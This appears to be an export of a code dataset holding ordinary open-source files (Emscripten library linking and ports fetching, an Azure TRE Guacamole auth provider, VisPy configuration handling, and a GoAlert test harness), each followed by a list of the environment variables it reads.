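# that whenever some_js_symbol is undefined in the inputs, needed_c_symbol is
# added to the undefined-symbol set (and exported), so the C library that
# provides it gets pulled in by the scan further down.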
deps_info = json.loads(open(shared.path_from_root('src', 'deps_info.json')).read())
added = set()
def add_back_deps(need):
more = False
for ident, deps in deps_info.items():
if ident in need.undefs and ident not in added:
added.add(ident)
more = True
for dep in deps:
# certain symbols in deps_info.json don't exist in the wasm backend
if shared.Settings.WASM_BACKEND and dep in ['_get_environ']:
continue
need.undefs.add(dep)
if shared.Settings.VERBOSE:
logger.debug('adding dependency on %s due to deps-info on %s' % (dep, ident))
shared.Settings.EXPORTED_FUNCTIONS.append(mangle_c_symbol_name(dep))
if more:
add_back_deps(need) # recurse to get deps of deps
# Scan symbols
symbolses = shared.Building.parallel_llvm_nm([os.path.abspath(t) for t in temp_files])
warn_on_unexported_main(symbolses)
if len(symbolses) == 0:
class Dummy(object):
defs = set()
undefs = set()
symbolses.append(Dummy())
# depend on exported functions
for export in shared.Settings.EXPORTED_FUNCTIONS:
if shared.Settings.VERBOSE:
logger.debug('adding dependency on export %s' % export)
symbolses[0].undefs.add(demangle_c_symbol_name(export))
for symbols in symbolses:
add_back_deps(symbols)
# If we are only doing forced stdlibs, then we don't know the actual symbols we need,
# and must assume all of deps_info must be exported. Note that this might cause
# warnings on exports that do not exist.
if only_forced:
for key, value in deps_info.items():
for dep in value:
shared.Settings.EXPORTED_FUNCTIONS.append(mangle_c_symbol_name(dep))
always_include.add('libpthread')
if shared.Settings.MALLOC != 'none':
always_include.add('libmalloc')
if shared.Settings.WASM_BACKEND:
always_include.add('libcompiler_rt')
libs_to_link = []
already_included = set()
system_libs_map = Library.get_usable_variations()
system_libs = sorted(system_libs_map.values(), key=lambda lib: lib.name)
# Setting this in the environment will avoid checking dependencies and make
# building big projects a little faster. 1 means include everything; otherwise
# it can be the name of a lib (libc++, etc.).
# You can provide 1 to include everything, or a comma-separated list of the
# ones you want.
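# e.g. (hypothetical invocation) EMCC_FORCE_STDLIBS=libc++,libmalloc would
# force those two libraries to be included, while EMCC_FORCE_STDLIBS=1
# force-includes every library that does not set never_force.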
force = os.environ.get('EMCC_FORCE_STDLIBS')
if force == '1':
force = ','.join(name for name, lib in system_libs_map.items() if not lib.never_force)
force_include = set((force.split(',') if force else []) + forced)
if force_include:
logger.debug('forcing stdlibs: ' + str(force_include))
for lib in always_include:
assert lib in system_libs_map
for lib in force_include:
if lib not in system_libs_map:
shared.exit_with_error('invalid forced library: %s', lib)
def add_library(lib):
if lib.name in already_included:
return
already_included.add(lib.name)
logger.debug('including %s (%s)' % (lib.name, lib.get_filename()))
need_whole_archive = lib.name in force_include and lib.get_ext() == '.a'
libs_to_link.append((lib.get_path(), need_whole_archive))
# Recursively add dependencies
for d in lib.get_depends():
add_library(system_libs_map[d])
for d in lib.js_depends:
d = '_' + d
if d not in shared.Settings.EXPORTED_FUNCTIONS:
shared.Settings.EXPORTED_FUNCTIONS.append(d)
if shared.Settings.STANDALONE_WASM:
add_library(system_libs_map['crt1'])
# Go over libraries to figure out which we must include
for lib in system_libs:
if lib.name in already_included:
continue
force_this = lib.name in force_include
if not force_this and only_forced:
continue
include_this = force_this or lib.name in always_include
if not include_this:
need_syms = set()
has_syms = set()
for symbols in symbolses:
if shared.Settings.VERBOSE:
logger.debug('undefs: ' + str(symbols.undefs))
for library_symbol in lib.symbols:
if library_symbol in symbols.undefs:
need_syms.add(library_symbol)
if library_symbol in symbols.defs:
has_syms.add(library_symbol)
for haz in has_syms:
if haz in need_syms:
# remove symbols that are supplied by another of the inputs
need_syms.remove(haz)
if shared.Settings.VERBOSE:
logger.debug('considering %s: we need %s and have %s' % (lib.name, str(need_syms), str(has_syms)))
if not len(need_syms):
continue
# We need to build and link the library in
add_library(lib)
if shared.Settings.WASM_BACKEND:
add_library(system_libs_map['libc_rt_wasm'])
if shared.Settings.UBSAN_RUNTIME == 1:
add_library(system_libs_map['libubsan_minimal_rt_wasm'])
elif shared.Settings.UBSAN_RUNTIME == 2:
add_library(system_libs_map['libubsan_rt_wasm'])
if shared.Settings.USE_LSAN:
force_include.add('liblsan_rt_wasm')
add_library(system_libs_map['liblsan_rt_wasm'])
if shared.Settings.USE_ASAN:
force_include.add('libasan_rt_wasm')
add_library(system_libs_map['libasan_rt_wasm'])
# the sanitizer runtimes may call mmap, which will need a few things. sadly
# the usual deps_info mechanism does not work since we scan only user files
# for things, and not libraries (to be able to scan libraries, we'd need to
# somehow figure out which of their object files will actually be linked in -
# but only lld knows that). so just directly handle that here.
if shared.Settings.UBSAN_RUNTIME or shared.Settings.USE_LSAN or shared.Settings.USE_ASAN:
shared.Settings.EXPORTED_FUNCTIONS.append(mangle_c_symbol_name('memset'))
if shared.Settings.STANDALONE_WASM:
add_library(system_libs_map['libstandalonewasm'])
if shared.Settings.PROXY_POSIX_SOCKETS:
add_library(system_libs_map['libsockets_proxy'])
else:
add_library(system_libs_map['libsockets'])
libs_to_link.sort(key=lambda x: x[0].endswith('.a')) # make sure to put .a files at the end.
# libc++abi and libc++ *static* linking is tricky. e.g. cxa_demangle.cpp disables c++
# exceptions, but since the string methods in the headers are *weakly* linked, then
# we might have exception-supporting versions of them from elsewhere, and if libc++abi
# is first then it would "win", breaking exception throwing from those string
# header methods. To avoid that, we link libc++abi last.
libs_to_link.sort(key=lambda x: x[0].endswith('libc++abi.bc'))
# Wrap libraries in --whole-archive, as needed. We need to do this last
# since otherwise the above sorting won't make sense.
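# For example (hypothetical inputs): [('libfoo.a', True), ('libbar.a', False)]
# becomes ['--whole-archive', 'libfoo.a', '--no-whole-archive', 'libbar.a'].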
ret = []
in_group = False
for name, need_whole_archive in libs_to_link:
if need_whole_archive and not in_group:
ret.append('--whole-archive')
in_group = True
if in_group and not need_whole_archive:
ret.append('--no-whole-archive')
in_group = False
ret.append(name)
if in_group:
ret.append('--no-whole-archive')
return ret
class Ports(object):
"""emscripten-ports library management (https://github.com/emscripten-ports).
"""
@staticmethod
def get_lib_name(name):
return name + static_library_ext()
@staticmethod
def get_include_dir():
dirname = shared.Cache.get_path('include')
shared.safe_ensure_dirs(dirname)
return dirname
@staticmethod
def install_header_dir(src_dir, target=None):
if not target:
target = os.path.basename(src_dir)
dest = os.path.join(Ports.get_include_dir(), target)
shared.try_delete(dest)
logger.debug('installing headers: ' + dest)
shutil.copytree(src_dir, dest)
@staticmethod
def install_headers(src_dir, pattern="*.h", target=None):
logger.debug("install_headers")
dest = Ports.get_include_dir()
if target:
dest = os.path.join(dest, target)
shared.safe_ensure_dirs(dest)
matches = glob.glob(os.path.join(src_dir, pattern))
assert matches, "no headers found to install in %s" % src_dir
for f in matches:
logger.debug('installing: ' + os.path.join(dest, os.path.basename(f)))
shutil.copyfile(f, os.path.join(dest, os.path.basename(f)))
@staticmethod
def build_port(src_path, output_path, includes=[], flags=[], exclude_files=[], exclude_dirs=[]):
srcs = []
for root, dirs, files in os.walk(src_path, topdown=False):
if any((excluded in root) for excluded in exclude_dirs):
continue
for f in files:
ext = os.path.splitext(f)[1]
if ext in ('.c', '.cpp') and not any((excluded in f) for excluded in exclude_files):
srcs.append(os.path.join(root, f))
include_commands = ['-I' + src_path]
for include in includes:
include_commands.append('-I' + include)
commands = []
objects = []
for src in srcs:
obj = src + '.o'
commands.append([shared.PYTHON, shared.EMCC, '-c', src, '-O2', '-o', obj, '-w'] + include_commands + flags)
objects.append(obj)
Ports.run_commands(commands)
create_lib(output_path, objects)
return output_path
@staticmethod
def run_commands(commands):
# Runs a sequence of compiler commands, adding important cflags as defined by get_cflags() so
# that the ports are built in the correct configuration.
def add_args(cmd):
# this must only be called on a standard build command
assert cmd[0] == shared.PYTHON and cmd[1] in (shared.EMCC, shared.EMXX)
# add standard cflags, but also allow the cmd to override them
return cmd[:2] + get_cflags() + cmd[2:]
run_build_commands([add_args(c) for c in commands])
@staticmethod
def create_lib(libname, inputs): # make easily available for port objects
create_lib(libname, inputs)
@staticmethod
def get_dir():
dirname = os.environ.get('EM_PORTS') or os.path.expanduser(os.path.join('~', '.emscripten_ports'))
shared.safe_ensure_dirs(dirname)
return dirname
@staticmethod
def erase():
dirname = Ports.get_dir()
shared.try_delete(dirname)
if os.path.exists(dirname):
logger.warning('could not delete ports dir %s - try to delete it manually' % dirname)
@staticmethod
def get_build_dir():
return shared.Cache.get_path('ports-builds')
name_cache = set()
@staticmethod
def fetch_project(name, url, subdir, is_tarbz2=False, sha512hash=None):
# To compute the sha512 hash, run `curl URL | sha512sum`.
fullname = os.path.join(Ports.get_dir(), name)
# EMCC_LOCAL_PORTS: A hacky way to use a local directory for a port. This
# is not tested but can be useful for debugging
# changes to a port.
#
# if EMCC_LOCAL_PORTS is set, we use a local directory as our ports. This is useful
# for testing. This env var should be in the format
# name=dir,name=dir
# e.g.
# sdl2=/home/username/dev/ports/SDL2
# so you could run
# EMCC_LOCAL_PORTS="sdl2=/home/alon/Dev/ports/SDL2" ./tests/runner.py browser.test_sdl2_mouse
# this will simply copy that directory into the ports directory for sdl2, and use that. It also
# clears the build, so that it is rebuilt from that source.
local_ports = os.environ.get('EMCC_LOCAL_PORTS')
if local_ports:
shared.Cache.acquire_cache_lock()
logger.warning('using local ports: %s' % local_ports)
local_ports = [pair.split('=', 1) for pair in local_ports.split(',')]
try:
for local in local_ports:
if name == local[0]:
path = local[1]
if name not in ports.ports_by_name:
shared.exit_with_error('%s is not a known port' % name)
port = ports.ports_by_name[name]
if not hasattr(port, 'SUBDIR'):
logger.error('port %s lacks .SUBDIR attribute, which we need in order to override it locally, please update it' % name)
sys.exit(1)
subdir = port.SUBDIR
target = os.path.join(fullname, subdir)
if os.path.exists(target) and not dir_is_newer(path, target):
logger.warning('not grabbing local port: ' + name + ' from ' + path + ' to ' + fullname + ' (subdir: ' + subdir + ') as the destination ' + target + ' is newer (run emcc --clear-ports if that is incorrect)')
else:
logger.warning('grabbing local port: ' + name + ' from ' + path + ' to ' + fullname + ' (subdir: ' + subdir + ')')
shared.try_delete(fullname)
shutil.copytree(path, target)
Ports.clear_project_build(name)
return
finally:
shared.Cache.release_cache_lock()
if is_tarbz2:
fullpath = fullname + '.tar.bz2'
elif url.endswith('.tar.gz'):
fullpath = fullname + '.tar.gz'
else:
fullpath = fullname + '.zip'
if name not in Ports.name_cache: # only mention each port once in log
logger.debug('including port: ' + name)
logger.debug(' (at ' + fullname + ')')
Ports.name_cache.add(name)
class State(object):
retrieved = False
unpacked = False
def retrieve():
# retrieve from remote server
logger.info('retrieving port: ' + name + ' from ' + url)
try:
import requests
response = requests.get(url)
data = response.content
except ImportError:
try:
from urllib.request import urlopen
f = urlopen(url)
data = f.read()
except ImportError:
# Python 2 compatibility
from urllib2 import urlopen
f = urlopen(url)
data = f.read()
if sha512hash:
actual_hash = hashlib.sha512(data).hexdigest()
if actual_hash != sha512hash:
raise RuntimeError('Unexpected hash: ' + actual_hash + '\n'
'If you are updating the port, please update the hash in the port module.')
open(fullpath, 'wb').write(data)
State.retrieved = True
def check_tag():
if is_tarbz2:
names = tarfile.open(fullpath, 'r:bz2').getnames()
elif url.endswith('.tar.gz'):
names = tarfile.open(fullpath, 'r:gz').getnames()
else:
names = zipfile.ZipFile(fullpath, 'r').namelist()
# check if the first entry of the archive is prefixed with the tag
# we expect; if so, there is no need to download and recompile again
return bool(re.match(subdir + r'(\\|/|$)', names[0]))
def unpack():
logger.info('unpacking port: ' + name)
shared.safe_ensure_dirs(fullname)
# TODO: Someday when we are using Python 3, we might want to change the
# code below to use shutil.unpack_archive
# e.g.: shutil.unpack_archive(filename=fullpath, extract_dir=fullname)
# (https://docs.python.org/3/library/shutil.html#shutil.unpack_archive)
if is_tarbz2:
z = tarfile.open(fullpath, 'r:bz2')
elif url.endswith('.tar.gz'):
z = tarfile.open(fullpath, 'r:gz')
else:
z = zipfile.ZipFile(fullpath, 'r')
try:
cwd = os.getcwd()
os.chdir(fullname)
z.extractall()
finally:
os.chdir(cwd)
State.unpacked = True
# main logic. do this under a cache lock, since we don't want multiple jobs to
# retrieve the same port at once
shared.Cache.acquire_cache_lock()
try:
if not os.path.exists(fullpath):
retrieve()
if not os.path.exists(fullname):
unpack()
if not check_tag():
logger.warning('local copy of port is not correct, retrieving from remote server')
shared.try_delete(fullname)
shared.try_delete(fullpath)
retrieve()
unpack()
if State.unpacked:
# we unpacked a new version, clear the build in the cache
Ports.clear_project_build(name)
finally:
shared.Cache.release_cache_lock()
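# Illustrative (hypothetical) call from a port module -- the name, URL, subdir
# and hash below are placeholders, not real values:
#   Ports.fetch_project('foo', 'https://example.com/foo-1.0.zip', 'foo-1.0',
#                       sha512hash='<hex digest of the archive>')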
@staticmethod
def clear_project_build(name):
port = ports.ports_by_name[name]
port.clear(Ports, shared)
shared.try_delete(os.path.join(Ports.get_build_dir(), name))
# get all ports
def get_ports(settings):
ret = []
try:
process_dependencies(settings)
for port in ports.ports:
# ports return their output files, which will be linked, or a txt file
ret += [f for f in port.get(Ports, settings, shared) if not f.endswith('.txt')]
except Exception:
logger.error('a problem occurred when using an emscripten-ports library. try to run `emcc --clear-ports` and then run this command again')
raise
ret.reverse()
return ret
def process_dependencies(settings):
for port in reversed(ports.ports):
if hasattr(port, "process_dependencies"):
port.process_dependencies(settings)
def process_args(args, settings):
process_dependencies(settings)
for port in ports.ports:
args = port.process_args(Ports, args, settings, shared)
return args
# get a single port
def get_port(name, settings):
port = ports.ports_by_name[name]
if hasattr(port, "process_dependencies"):
port.process_dependencies(settings)
# ports return their output files, which will be linked, or a txt file
return [f for f in port.get(Ports, settings, shared) if not f.endswith('.txt')]
def show_ports():
print('Available ports:')
for port in ports.ports:
print(' ', port.show())
|
[] |
[] |
[
"EMCC_ONLY_FORCED_STDLIBS",
"EMCC_LOCAL_PORTS",
"EMCC_FORCE_STDLIBS",
"EM_PORTS"
] |
[]
|
["EMCC_ONLY_FORCED_STDLIBS", "EMCC_LOCAL_PORTS", "EMCC_FORCE_STDLIBS", "EM_PORTS"]
|
python
| 4 | 0 | |
templates/workspace_services/guacamole/guacamole-server/guacamole-auth-azure/src/main/java/org/apache/guacamole/auth/azuretre/AzureTREAuthenticationProvider.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.guacamole.auth.azuretre;
import com.auth0.jwk.UrlJwkProvider;
import com.google.common.base.Strings;
import org.apache.guacamole.GuacamoleException;
import org.apache.guacamole.auth.azuretre.connection.ConnectionService;
import org.apache.guacamole.auth.azuretre.user.AzureTREAuthenticatedUser;
import org.apache.guacamole.auth.azuretre.user.TreUserContext;
import org.apache.guacamole.net.auth.AbstractAuthenticationProvider;
import org.apache.guacamole.net.auth.AuthenticatedUser;
import org.apache.guacamole.net.auth.Credentials;
import org.apache.guacamole.net.auth.UserContext;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.net.URL;
public class AzureTREAuthenticationProvider extends AbstractAuthenticationProvider {
public static final String ROOT_CONNECTION_GROUP = "ROOT";
private static final Logger LOGGER = LoggerFactory.getLogger(AzureTREAuthenticationProvider.class);
private final AuthenticationProviderService authenticationProviderService;
public AzureTREAuthenticationProvider() {
this.authenticationProviderService = new AuthenticationProviderService();
}
public AzureTREAuthenticationProvider(
AuthenticationProviderService authenticationProviderService) {
if (authenticationProviderService == null) {
this.authenticationProviderService = new AuthenticationProviderService();
} else {
this.authenticationProviderService = authenticationProviderService;
}
}
@Override
public String getIdentifier() {
return "azuretre";
}
@Override
public AuthenticatedUser updateAuthenticatedUser(AuthenticatedUser authenticatedUser, Credentials credentials)
throws GuacamoleException {
LOGGER.info("updateAuthenticatedUser");
AuthenticatedUser updated = authenticateUser(credentials);
LOGGER.info("updateAuthenticatedUser - done");
return updated;
}
@Override
public AzureTREAuthenticatedUser authenticateUser(final Credentials credentials) {
LOGGER.info("Authenticating user");
// Getting headers from the oauth2 proxy
final String accessToken = credentials.getRequest().getHeader("X-Forwarded-Access-Token");
final String prefEmail = credentials.getRequest().getHeader("X-Forwarded-Email");
if (Strings.isNullOrEmpty(accessToken)) {
LOGGER.error("access token was not provided");
return null;
}
if (Strings.isNullOrEmpty(prefEmail)) {
LOGGER.error("email was not provided");
return null;
}
return new AzureTREAuthenticatedUser(credentials, accessToken, prefEmail, null, this);
}
@Override
public UserContext getUserContext(final AuthenticatedUser authenticatedUser) throws GuacamoleException {
LOGGER.debug("Getting user context.");
if (authenticatedUser instanceof AzureTREAuthenticatedUser) {
final AzureTREAuthenticatedUser user = (AzureTREAuthenticatedUser) authenticatedUser;
final String accessToken = user.getAccessToken();
LOGGER.debug("Getting configurations in order to populate user context.");
var connections = ConnectionService.getConnections(user);
LOGGER.debug("Creating user context.");
final TreUserContext treUserContext = new TreUserContext(this, connections);
treUserContext.init(user);
// Validate the token 'again': the OpenID extension verified it, but it didn't verify
// that we got the correct roles. The fact that a valid token was returned doesn't mean
// this user is an Owner or a Researcher. If it isn't, break and don't try to get any VMs.
// Note: At the moment there is NO apparent way to UN-authorize a user that a previous
// extension authorized... (The user will see an empty list of VMs.)
// Note 2: The API app will also verify the token and in any case will not return any VMs
// in that situation.
try {
LOGGER.info("Validating token");
final UrlJwkProvider jwkProvider =
new UrlJwkProvider(new URL(System.getenv("OAUTH2_PROXY_JWKS_ENDPOINT")));
authenticationProviderService.validateToken(accessToken, jwkProvider);
} catch (final Exception ex) {
// Failed to validate the token
LOGGER.error("Failed to validate token. ex: " + ex);
return null;
}
return treUserContext;
}
return null;
}
@Override
public UserContext updateUserContext(UserContext context, AuthenticatedUser authenticatedUser,
Credentials credentials)
throws GuacamoleException {
LOGGER.debug("Updating usercontext");
var userContext = getUserContext(authenticatedUser);
return userContext;
}
}
|
[
"\"OAUTH2_PROXY_JWKS_ENDPOINT\""
] |
[] |
[
"OAUTH2_PROXY_JWKS_ENDPOINT"
] |
[]
|
["OAUTH2_PROXY_JWKS_ENDPOINT"]
|
java
| 1 | 0 | |
vispy/util/config.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""Vispy configuration functions
"""
import os
from os import path as op
import json
import sys
import platform
import getopt
import traceback
import tempfile
import atexit
from shutil import rmtree
from .event import EmitterGroup, EventEmitter, Event
from .logs import logger, set_log_level, use_log_level
from ..ext.six import string_types, file_types
config = None
_data_path = None
_allowed_config_keys = None
def _init():
""" Create global Config object, parse command flags
"""
global config, _data_path, _allowed_config_keys
app_dir = _get_vispy_app_dir()
if app_dir is not None:
_data_path = op.join(app_dir, 'data')
_test_data_path = op.join(app_dir, 'test_data')
else:
_data_path = _test_data_path = None
# All allowed config keys and the types they may have
_allowed_config_keys = {
'data_path': string_types,
'default_backend': string_types,
'gl_backend': string_types,
'gl_debug': (bool,),
'glir_file': string_types+file_types,
'include_path': list,
'logging_level': string_types,
'qt_lib': string_types,
'dpi': (int, type(None)),
'profile': string_types + (type(None),),
'audit_tests': (bool,),
'test_data_path': string_types + (type(None),),
}
# Default values for all config options
default_config_options = {
'data_path': _data_path,
'default_backend': '',
'gl_backend': 'gl2',
'gl_debug': False,
'glir_file': '',
'include_path': [],
'logging_level': 'info',
'qt_lib': 'any',
'dpi': None,
'profile': None,
'audit_tests': False,
'test_data_path': _test_data_path,
}
config = Config(**default_config_options)
try:
config.update(**_load_config())
except Exception as err:
raise Exception('Error while reading vispy config file "%s":\n %s' %
(_get_config_fname(), str(err)))
set_log_level(config['logging_level'])
_parse_command_line_arguments()
###############################################################################
# Command line flag parsing
VISPY_HELP = """
VisPy command line arguments:
--vispy-backend=(qt|pyqt4|pyqt5|pyside|glfw|pyglet|sdl2|wx)
Selects the backend system for VisPy to use. This will override the default
backend selection in your configuration file.
--vispy-log=(debug|info|warning|error|critical)[,search string]
Sets the verbosity of logging output. The default is 'warning'. If a search
string is given, messages will only be displayed if they match the string,
or if their call location (module.class:method(line) or
module:function(line)) matches the string.
--vispy-dpi=resolution
Force the screen resolution to a certain value (in pixels per inch). By
default, the OS is queried to determine the screen DPI.
--vispy-fps
Print the framerate (in Frames Per Second) in the console.
--vispy-gl-debug
Enables error checking for all OpenGL calls.
--vispy-glir-file
Export glir commands to specified file.
--vispy-profile=locations
Measure performance at specific code locations and display results.
*locations* may be "all" or a comma-separated list of method names like
"SceneCanvas.draw_visual".
--vispy-cprofile
Enable profiling using the built-in cProfile module and display results
when the program exits.
--vispy-audit-tests
Enable user auditing of image test results.
--vispy-help
Display this help message.
"""
def _parse_command_line_arguments():
""" Transform vispy specific command line args to vispy config.
Put into a function so that any variables dont leak in the vispy namespace.
"""
global config
# Get command line args for vispy
argnames = ['vispy-backend=', 'vispy-gl-debug', 'vispy-glir-file=',
'vispy-log=', 'vispy-help', 'vispy-profile=', 'vispy-cprofile',
'vispy-dpi=', 'vispy-audit-tests']
try:
opts, args = getopt.getopt(sys.argv[1:], '', argnames)
except getopt.GetoptError:
opts = []
# Use them to set the config values
for o, a in opts:
if o.startswith('--vispy'):
if o == '--vispy-backend':
config['default_backend'] = a
logger.info('vispy backend: %s', a)
elif o == '--vispy-gl-debug':
config['gl_debug'] = True
elif o == '--vispy-glir-file':
config['glir_file'] = a
elif o == '--vispy-log':
if ',' in a:
verbose, match = a.split(',')
else:
verbose = a
match = None
config['logging_level'] = a
set_log_level(verbose, match)
elif o == '--vispy-profile':
config['profile'] = a
elif o == '--vispy-cprofile':
_enable_profiling()
elif o == '--vispy-help':
print(VISPY_HELP)
elif o == '--vispy-dpi':
config['dpi'] = int(a)
elif o == '--vispy-audit-tests':
config['audit_tests'] = True
else:
logger.warning("Unsupported vispy flag: %s" % o)
###############################################################################
# CONFIG
# Adapted from pyzolib/paths.py:
# https://bitbucket.org/pyzo/pyzolib/src/tip/paths.py
def _get_vispy_app_dir():
"""Helper to get the default directory for storing vispy data"""
# Define default user directory
user_dir = os.path.expanduser('~')
# Get system app data dir
path = None
if sys.platform.startswith('win'):
path1, path2 = os.getenv('LOCALAPPDATA'), os.getenv('APPDATA')
path = path1 or path2
elif sys.platform.startswith('darwin'):
path = os.path.join(user_dir, 'Library', 'Application Support')
# On Linux and as fallback
if not (path and os.path.isdir(path)):
path = user_dir
# Maybe we should store things local to the executable (in case of a
# portable distro or a frozen application that wants to be portable)
prefix = sys.prefix
if getattr(sys, 'frozen', None): # See application_dir() function
prefix = os.path.abspath(os.path.dirname(sys.path[0]))
for reldir in ('settings', '../settings'):
localpath = os.path.abspath(os.path.join(prefix, reldir))
if os.path.isdir(localpath):
try:
open(os.path.join(localpath, 'test.write'), 'wb').close()
os.remove(os.path.join(localpath, 'test.write'))
except IOError:
pass # We cannot write in this directory
else:
path = localpath
break
# Get path specific for this app
appname = '.vispy' if path == user_dir else 'vispy'
path = os.path.join(path, appname)
return path
class ConfigEvent(Event):
""" Event indicating a configuration change.
This class has a 'changes' attribute which is a dict of all name:value
pairs that have changed in the configuration.
"""
def __init__(self, changes):
Event.__init__(self, type='config_change')
self.changes = changes
class Config(object):
""" Container for global settings used application-wide in vispy.
Events:
-------
Config.events.changed - Emits ConfigEvent whenever the configuration
changes.
"""
def __init__(self, **kwargs):
self.events = EmitterGroup(source=self)
self.events['changed'] = EventEmitter(
event_class=ConfigEvent,
source=self)
self._config = {}
self.update(**kwargs)
self._known_keys = get_config_keys()
def __getitem__(self, item):
return self._config[item]
def __setitem__(self, item, val):
self._check_key_val(item, val)
self._config[item] = val
# inform any listeners that a configuration option has changed
self.events.changed(changes={item: val})
def _check_key_val(self, key, val):
global _allowed_config_keys
# check values against acceptable ones
known_keys = _allowed_config_keys
if key not in known_keys:
raise KeyError('key "%s" not in known keys: "%s"'
% (key, known_keys))
if not isinstance(val, known_keys[key]):
raise TypeError('Value for key "%s" must be one of %s, not %s.'
% (key, known_keys[key], type(val)))
def update(self, **kwargs):
for key, val in kwargs.items():
self._check_key_val(key, val)
self._config.update(kwargs)
self.events.changed(changes=kwargs)
def __repr__(self):
return repr(self._config)
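# A minimal usage sketch (assuming the module-level `config` object has been
# initialized by _init() at the bottom of this file); setting a key emits a
# ConfigEvent to any connected listeners:
#   config.events.changed.connect(lambda ev: print(ev.changes))
#   config['logging_level'] = 'debug'   # emits ConfigEvent({'logging_level': 'debug'})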
def get_config_keys():
"""The config keys known by vispy and their allowed data types.
Returns
-------
keys : dict
Dict of {key: (types,)} pairs.
"""
global _allowed_config_keys
return _allowed_config_keys.copy()
def _get_config_fname():
"""Helper for the vispy config file"""
directory = _get_vispy_app_dir()
if directory is None:
return None
fname = op.join(directory, 'vispy.json')
if os.environ.get('_VISPY_CONFIG_TESTING', None) is not None:
fname = op.join(_TempDir(), 'vispy.json')
return fname
def _load_config():
"""Helper to load prefs from ~/.vispy/vispy.json"""
fname = _get_config_fname()
if fname is None or not op.isfile(fname):
return dict()
with open(fname, 'r') as fid:
config = json.load(fid)
return config
def save_config(**kwargs):
"""Save configuration keys to vispy config file
Parameters
----------
**kwargs : keyword arguments
Key/value pairs to save to the config file.
"""
if kwargs == {}:
kwargs = config._config
current_config = _load_config()
current_config.update(**kwargs)
# write to disk
fname = _get_config_fname()
if fname is None:
raise RuntimeError('config filename could not be determined')
if not op.isdir(op.dirname(fname)):
os.mkdir(op.dirname(fname))
with open(fname, 'w') as fid:
json.dump(current_config, fid, sort_keys=True, indent=0)
def set_data_dir(directory=None, create=False, save=False):
"""Set vispy data download directory"""
if directory is None:
directory = _data_path
if _data_path is None:
raise IOError('default path cannot be determined, please '
'set it manually (directory != None)')
if not op.isdir(directory):
if not create:
raise IOError('directory "%s" does not exist, perhaps try '
'create=True to create it?' % directory)
os.mkdir(directory)
config.update(data_path=directory)
if save:
save_config(data_path=directory)
def _enable_profiling():
""" Start profiling and register callback to print stats when the program
exits.
"""
import cProfile
import atexit
global _profiler
_profiler = cProfile.Profile()
_profiler.enable()
atexit.register(_profile_atexit)
_profiler = None
def _profile_atexit():
global _profiler
_profiler.print_stats(sort='cumulative')
def sys_info(fname=None, overwrite=False):
"""Get relevant system and debugging information
Parameters
----------
fname : str | None
Filename to dump info to. Use None to simply print.
overwrite : bool
If True, overwrite file (if it exists).
Returns
-------
out : str
The system information as a string.
"""
if fname is not None and op.isfile(fname) and not overwrite:
raise IOError('file exists, use overwrite=True to overwrite')
out = ''
try:
# Nest all imports here to avoid any circular imports
from ..app import use_app, Canvas
from ..app.backends import BACKEND_NAMES
from ..gloo import gl
from ..testing import has_backend
# get default app
with use_log_level('warning'):
app = use_app(call_reuse=False) # suppress messages
out += 'Platform: %s\n' % platform.platform()
out += 'Python: %s\n' % str(sys.version).replace('\n', ' ')
out += 'Backend: %s\n' % app.backend_name
for backend in BACKEND_NAMES:
if backend.startswith('ipynb_'):
continue
with use_log_level('warning', print_msg=False):
which = has_backend(backend, out=['which'])[1]
out += '{0:<9} {1}\n'.format(backend + ':', which)
out += '\n'
# We need an OpenGL context to get GL info
canvas = Canvas('Test', (10, 10), show=False, app=app)
canvas._backend._vispy_set_current()
out += 'GL version: %r\n' % (gl.glGetParameter(gl.GL_VERSION),)
x_ = gl.GL_MAX_TEXTURE_SIZE
out += 'MAX_TEXTURE_SIZE: %r\n' % (gl.glGetParameter(x_),)
out += 'Extensions: %r\n' % (gl.glGetParameter(gl.GL_EXTENSIONS),)
canvas.close()
except Exception: # don't stop printing info
out += '\nInfo-gathering error:\n%s' % traceback.format_exc()
pass
if fname is not None:
with open(fname, 'w') as fid:
fid.write(out)
return out
class _TempDir(str):
"""Class for creating and auto-destroying temp dir
This is designed to be used with testing modules.
We cannot simply use __del__() method for cleanup here because the rmtree
function may be cleaned up before this object, so we use the atexit module
instead.
"""
def __new__(self):
new = str.__new__(self, tempfile.mkdtemp())
return new
def __init__(self):
self._path = self.__str__()
atexit.register(self.cleanup)
def cleanup(self):
rmtree(self._path, ignore_errors=True)
# initialize config options
_init()
|
[] |
[] |
[
"APPDATA",
"_VISPY_CONFIG_TESTING",
"LOCALAPPDATA"
] |
[]
|
["APPDATA", "_VISPY_CONFIG_TESTING", "LOCALAPPDATA"]
|
python
| 3 | 0 | |
smoketest/harness/harness.go
|
package harness
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"net/http/httptest"
"net/url"
"os"
"path/filepath"
"reflect"
"sort"
"strings"
"sync"
"testing"
"text/template"
"time"
"github.com/jackc/pgx/v4"
"github.com/jackc/pgx/v4/pgxpool"
"github.com/jackc/pgx/v4/stdlib"
"github.com/pkg/errors"
uuid "github.com/satori/go.uuid"
"github.com/target/goalert/alert"
"github.com/target/goalert/app"
"github.com/target/goalert/config"
"github.com/target/goalert/devtools/mockslack"
"github.com/target/goalert/devtools/mocktwilio"
"github.com/target/goalert/devtools/pgdump-lite"
"github.com/target/goalert/migrate"
"github.com/target/goalert/notification/twilio"
"github.com/target/goalert/permission"
"github.com/target/goalert/user"
"github.com/target/goalert/user/notificationrule"
"github.com/target/goalert/util/log"
"github.com/target/goalert/util/sqlutil"
)
const dbTimeFormat = "2006-01-02 15:04:05.999999-07:00"
var (
dbURLStr string
dbURL *url.URL
)
func init() {
dbURLStr = os.Getenv("DB_URL")
if dbURLStr == "" {
	dbURLStr = "postgres://goalert@localhost:5432?sslmode=disable"
}
var err error
dbURL, err = url.Parse(dbURLStr)
if err != nil {
panic(err)
}
}
func DBURL(name string) string {
